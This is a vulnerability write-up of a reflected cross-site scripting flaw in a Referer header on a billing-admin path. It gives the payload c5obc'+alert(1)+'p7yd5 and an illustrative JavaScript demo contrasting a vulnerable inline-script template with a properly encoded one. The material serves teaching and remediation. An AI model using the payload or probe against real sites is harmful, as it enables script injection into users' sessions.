Real World Example:
Path : /billing-admin/profile/subscription/?l=de
Payload : c5obc'+alert(1)+'p7yd5
Steps to reproduce :
Request Header :
GET /billing-admin/profile/subscription/?l=de HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
The payload c5obc'+alert(1)+'p7yd5 was submitted in the Referer HTTP header (the Referer line itself is not reproduced in the request excerpt above). The application copied the header value out of the request and echoed it into its immediate response without encoding it for the context it landed in.
The shape of the payload (a random canary, then '+alert(1)+', then a second canary) targets a reflection point inside a single-quoted JavaScript string: the first quote closes the literal, alert(1) is concatenated in as code, and the second quote reopens the string so the script still parses. Because the value is reflected back unencoded, this is a reflected cross-site scripting (XSS) vulnerability. Exploiting a Referer-based reflection in practice requires the victim to arrive from an attacker-controlled page whose URL carries the payload, and a referrer policy that still sends the full URL to the target.
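The following is an added example, not code from the original write-up or from the affected application. It models the reflection point the payload shape implies (the Referer value concatenated into a single-quoted JavaScript string in an inline script), shows the hardened encoder beside it, and evaluates the rendered script with a stubbed alert() to confirm whether the payload executes. The template, the variable name backLink and the Referer URL https://example.test/ are assumptions for illustration.

```javascript
// Added example (not from the original write-up). Models a server that reflects
// the Referer header into an inline <script> and shows why the payload
// c5obc'+alert(1)+'p7yd5 executes there, plus a safe encoder.

const PAYLOAD = "c5obc'+alert(1)+'p7yd5";

// Raw HTTP request as a tester would send it; the Referer URL is assumed.
function buildProbeRequest(path, payload) {
  return [
    `GET ${path} HTTP/1.1`,
    "Host: example.test",
    "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    `Referer: https://example.test/${payload}`,
    "",
    "",
  ].join("\r\n");
}

// Vulnerable template (assumed): string concatenation into a single-quoted
// JS literal. A quote in the Referer terminates the literal.
function renderVulnerable(referer) {
  return `<script>var backLink = '${referer}';</script>`;
}

// Safe encoder for a JS-string-literal context: JSON.stringify escapes quotes
// and backslashes; the extra replacements stop the value from closing the
// <script> element or injecting JS line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(referer) {
  return `<script>var backLink = ${jsStringLiteral(referer)};</script>`;
}

// Pull the first inline script out of the response and run it with alert()
// stubbed, the way a browser would execute it. Returns how many times alert
// fired and the final value of backLink (or the thrown error).
function executeInlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  if (!m) return { alertCalls: 0, backLink: undefined };
  let alertCalls = 0;
  const alertStub = () => { alertCalls++; };
  let backLink;
  try {
    const fn = new Function("alert", m[1] + "; return backLink;");
    backLink = fn(alertStub);
  } catch (e) {
    backLink = e;
  }
  return { alertCalls, backLink };
}

// Stand-alone demo.
console.log(buildProbeRequest("/billing-admin/profile/subscription/?l=de", PAYLOAD));
console.log("vulnerable:", executeInlineScript(renderVulnerable(PAYLOAD)));
console.log("safe:      ", executeInlineScript(renderSafe(PAYLOAD)));
```

In the vulnerable rendering the script body becomes var backLink = 'c5obc'+alert(1)+'p7yd5'; and alert fires once; in the safe rendering the whole payload stays inside one string literal and backLink simply equals the Referer value. Encoding for the JavaScript-string context is the fix; HTML-entity encoding alone would not help here, because entities are not decoded inside a script block.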